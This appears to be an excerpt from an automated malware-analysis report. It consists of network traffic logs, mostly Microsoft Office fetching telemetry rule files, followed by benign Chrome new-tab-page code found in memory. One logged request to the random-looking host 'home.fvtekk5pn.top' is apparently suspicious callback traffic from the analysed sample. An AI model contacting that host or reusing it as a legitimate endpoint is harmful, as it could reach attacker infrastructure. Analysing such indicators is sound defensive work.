Source: global traffic HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: chrome.exe, 00000004.00000003.2886164916.000055A8027D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4609035172.000055A8028F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000003.2886164916.000055A8027D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.4609035172.000055A8028F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000003.2892909778.000055A8031AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2892988602.000055A803184000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2892785753.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000004.00000003.2892909778.000055A8031AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2892988602.000055A803184000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2892785753.000055A8025C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) 